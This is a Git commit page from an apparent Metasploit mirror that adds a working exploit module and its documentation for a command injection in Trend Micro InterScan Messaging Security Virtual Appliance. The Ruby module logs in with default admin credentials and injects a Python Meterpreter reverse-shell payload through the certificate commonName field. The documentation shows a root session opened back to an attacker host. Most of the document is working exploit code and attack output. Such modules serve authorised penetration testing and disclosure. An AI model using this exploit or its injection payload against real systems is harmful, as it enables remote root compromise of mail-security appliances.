infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding Trend Micro IMSVA module

bug/bundler_fix
Mehmet Ince 2017-01-18 11:34:16 +03:00
parent b86c1f0465
commit c2c352c2ac
No known key found for this signature in database
GPG Key ID: 11EF24A306357530
2 changed files with 217 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

71
documentation/modules/exploit/linux/http/trend_micro_imsva_exec.md Normal file
View File

@ -0,0 +1,71 @@
## Vulnerable Application
This module exploits a command injection vulnerability in the Trend Micro InterScan Messaging Security (Virtual Appliance) product. An authenticated user can execute a terminal command under the context of the web server user which is root. Besides, default installation of IMSVA comes with a default administrator credentials.
saveCert.imss endpoint takes several user inputs and performs blacklisting. After that it use them as argument of predefined operating system command without proper sanitation. However,due to improper blacklisting rule it's possible to inject arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
**Vulnerable Application Installation Steps**
IMSVA is distrubed as an ISO image by Trend Micro.
Following steps are valid on the CentOS 6 x64 bit operating system.
1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
2. Find "InterScan Messaging Security (Virtual Appliance)" and click.
3. At the time of writing this documentation, you must see "IMSVA-9.1-1600-x86-64-r2.iso" next to Download button.
4. Click to the download button and complete installation of ISO.
If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-1600 directly from following URL.
[http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso](http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso)
**System requirements:**
- Virtualbox or VMware can be used.
- 4 GB of memory at least.
- 120 GB of disk size at least.
## Verification Steps
A successful check of the exploit will look like this:
```
msf > use exploit/linux/http/trend_micro_imsva_exec
msf exploit(trend_micro_imsva_exec) > set RHOST 12.0.0.140
RHOST => 12.0.0.140
msf exploit(trend_micro_imsva_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(trend_micro_imsva_exec) > exploit
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Attempting to login with admin:imsva
[+] Authenticated as admin:imsva
[*] Delivering payload...
[*] Sending stage (38622 bytes) to 12.0.0.140
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.140:60822) at 2017-01-18 11:29:36 +0300
meterpreter > getuid
Server username: root
meterpreter >
```
You must be getting ```no access``` error if the supplied username and password or default credentials are wrong.
```
msf exploit(trend_micro_imsva_exec) > back
msf > use exploit/linux/http/trend_micro_imsva_exec
msf exploit(trend_micro_imsva_exec) > set RHOST 12.0.0.140
RHOST => 12.0.0.140
msf exploit(trend_micro_imsva_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(trend_micro_imsva_exec) >
msf exploit(trend_micro_imsva_exec) > set USERNAME notvalid
USERNAME => notvalid
msf exploit(trend_micro_imsva_exec) > set PASSWORD notvalid123
PASSWORD => notvalid123
msf exploit(trend_micro_imsva_exec) > exploit
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Attempting to login with notvalid:notvalid123
[-] Exploit aborted due to failure: no-access: 12.0.0.140:8445 - Login with notvalid:notvalid123 failed...
[*] Exploit completed, but no session was created.
```

146
modules/exploits/linux/http/trend_micro_imsva_exec.rb Normal file
View File

@ -0,0 +1,146 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution',
'Description' => %q{
This module exploits a command injection vulnerability in the Trend Micro
IMSVA product. An authenticated user can execute a terminal command under
the context of the web server user which is root. Besides, default installation
of IMSVA comes with a default administrator credentials.
saveCert.imss endpoint takes several user inputs and performs blacklisting.
After that it use them as argument of predefined operating system command
without proper sanitation. However,due to improper blacklisting rule it's possible to inject
arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
This module was tested against IMSVA 9.1-1600.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/']
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x2f\x22"
},
'DefaultOptions' =>
{
'SSL' => true,
'payload' => 'python/meterpreter/reverse_tcp',
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Jan 15 2017',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']),
OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]),
Opt::RPORT(8445)
]
)
end
def login
user = datastore['USERNAME']
pass = datastore['PASSWORD']
print_status("Attempting to login with #{user}:#{pass}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login.imss'),
'vars_post' => {
'userid' => user,
'pwdfake' => Rex::Text::encode_base64(pass)
}
})
if res && res.body.include?("The user name or password you entered is invalid")
fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...")
end
cookie = res.get_cookies
if res.code == 302 && cookie.include?("JSESSIONID")
jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first
print_good("Authenticated as #{user}:#{pass}")
return jsessionid
end
nil
end
def exploit
jsessionid = login
unless jsessionid
fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
end
# Somehow java stores last visited url on session like viewstate!
# Visit form before submitting it. Otherwise, it will cause a crash.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'initCert.imss'),
'cookie' => "JSESSIONID=#{jsessionid}"
})
if !res or !res.body.include?("Transport Layer Security")
fail_with(Failure::Unknown, 'Unable to visit initCert.imss')
end
# Random string that will be used as a cert name, state, email etc.
r = Rex::Text::rand_text_alphanumeric(5)
print_status("Delivering payload...")
# Since double quote are blacklisted, we are using Single, Backslash, Single, Single on our payload. Thanks to @wvu !!!
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'saveCert.imss'),
'cookie' => "JSESSIONID=#{jsessionid}",
'vars_get' => {
'mode' => 0
},
'vars_post' => {
'certName' => r,
'certType' => 0,
'keyLength' => 2048,
'countryCode' => 'TR',
'state' => r,
'locality' => r,
'org' => r,
'orgUnit' => r,
'commonName' => "#{r}';python -c '#{payload.encoded.gsub("'", "'\\\\''")}' #",
'emailAddress' => "#{r}@mail.com",
'validDays' => '',
'id' => '',
}
})
end
end